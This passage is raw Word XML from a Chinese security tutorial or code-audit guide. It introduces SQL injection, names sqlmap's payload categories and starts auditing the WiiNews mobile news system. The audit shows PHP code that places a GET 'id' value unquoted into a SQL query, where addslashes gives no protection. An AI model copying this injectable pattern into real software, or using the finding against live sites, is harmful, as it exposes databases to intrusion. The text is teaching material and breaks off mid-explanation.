                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>&amp;dbpass=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>密码</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="45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&amp;admin_user=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>管理员帐号</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>&amp;admin_pass=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>管理员密码</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>&amp;blogn</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>ame=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>博客名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14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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRPr="00623EEB" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="SQL注入漏洞"/>
      <w:bookmarkStart w:id="18" w:name="_bookmark8"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/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spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="14"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="598" w:lineRule="exact"/>
        <w:ind w:left="417"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="419"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入攻击（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>），简称注入攻击，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开发中最常见的一种安全漏洞。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入漏洞可以用来从数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取敏感信息，或者利用数据库的特性执行添加用户，导出文件等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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系列恶意操作，甚至有可能获取数据库乃至系统最高权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317" w:firstLine="420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现在注入可分为六种，哪六种呢？可以参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>目录下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="37" w:line="225" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="608"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>01_boolean_blind.xml 02_error_based.xml 03_inline_query.xml 04_stacked_queries.xml 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">5_time_blind.xml 06_union_query.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>其实还不止，还有二次注入等等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="225" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:footerReference w:type="default" r:id="rId21"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="30"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417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spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="WiiNews(Mobile新闻系统)"/>
      <w:bookmarkStart w:id="20" w:name="_bookmark9"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>WiiNews(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>闻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317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作者：路人甲</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="24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</w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:group id="_x0000_s10091" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:20.15pt;width:321.05pt;height:85.75pt;z-index:1528;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="1797,403" coordsize="6421,1715">
            <v:rect id="_x0000_s10097" style="position:absolute;left:1797;top:403;width:6385;height:343" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10096" style="position:absolute;left:1797;top:746;width:6385;height:343" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10095" style="position:absolute;left:1797;top:1089;width:6385;height:343" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10094" style="position:absolute;left:1797;top:1432;width:6385;height:343" fillcolor="#d7d7d7" stroked="f"/>
            <v:rect id="_x0000_s10093" style="position:absolute;left:1797;top:1775;width:6385;height:343" fillcolor="#d7d7d7" stroked="f"/>
            <v:shape id="_x0000_s10092" type="#_x0000_t202" style="position:absolute;left:1797;top:403;width:6421;height:1715" filled="f" stroked="f">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="301" w:lineRule="exact"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$id=</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>sqlReplace(</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>Trim($_GET['id']));</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="343" w:lineRule="exact"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$sqlStr="select * from wiinews_news where news_id=$id";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="16" w:line="344" w:lineRule="exact"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑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sz w:val="20"/>
                      </w:rPr>
                      <w:t>$result = mysql_</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>query(</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$sqlStr) or die ("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查询失败，请检查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 xml:space="preserve"> SQL</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                        <w:spacing w:val="-44"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t xml:space="preserve"> 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语句。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 xml:space="preserve"> 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编码号：</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>1010");</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="327" w:lineRule="exact"/>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$row = mysql_fetch_</w:t>
                    </w:r>
                    <w:proofErr w:type="gramStart"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>array(</w:t>
                    </w:r>
                    <w:proofErr w:type="gramEnd"/>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="微软雅黑"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$result);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微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>先来段简单的程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="322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这里通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">$_GET </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>之后给了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sqlReplace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>这个函数处理。然而，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">trim </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>是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什么自己抱着手册来看。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="19"/>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10090" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:38.15pt;width:319.25pt;height:137.25pt;z-index:1552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pStyle w:val="a3"/>
                    <w:spacing w:line="301" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>function</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> sqlReplace($str)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6" w:line="344" w:lineRule="exact"/>
                    <w:ind w:right="2510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 xml:space="preserve">$strResult = $str; </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>if(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>!get_magic_quotes_gpc())</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="326" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>//</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>如果</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> gpc </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                      <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                    <w:t>没有开的话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  <w:lang w:eastAsia="zh-CN"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                      <w:w w:val="99"/>
                      <w:lang w:eastAsia="zh-CN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 xml:space="preserve">$strResult = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>addslashes(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>$strResult);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="344" w:lineRule="exact"/>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>//</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>编码</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="topAndBottom" anchorx="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:t>然后就带入了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>查询，但在之之后，我们需要查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sqlReplace(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>函数对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">$_GET['id'] </w:t>
      </w:r>
      <w:r>
        <w:t>做了一些什么处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:p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10089" type="#_x0000_t202" style="width:319.25pt;height:68.6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pStyle w:val="a3"/>
                    <w:spacing w:line="302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proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t>return</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTMLEncode($strResult);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 w:eastAsia="微软雅黑"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t xml:space="preserve">//gpc </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>开的话，返回</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
                    </w:rPr>
                    <w:t>HTMLEncode()</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="344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7"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="322" w:lineRule="exact"/>
        <w:ind w:right="239"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这里判断如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> gpc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>没有开启的话通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>内置函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> addslashesf </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="18"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
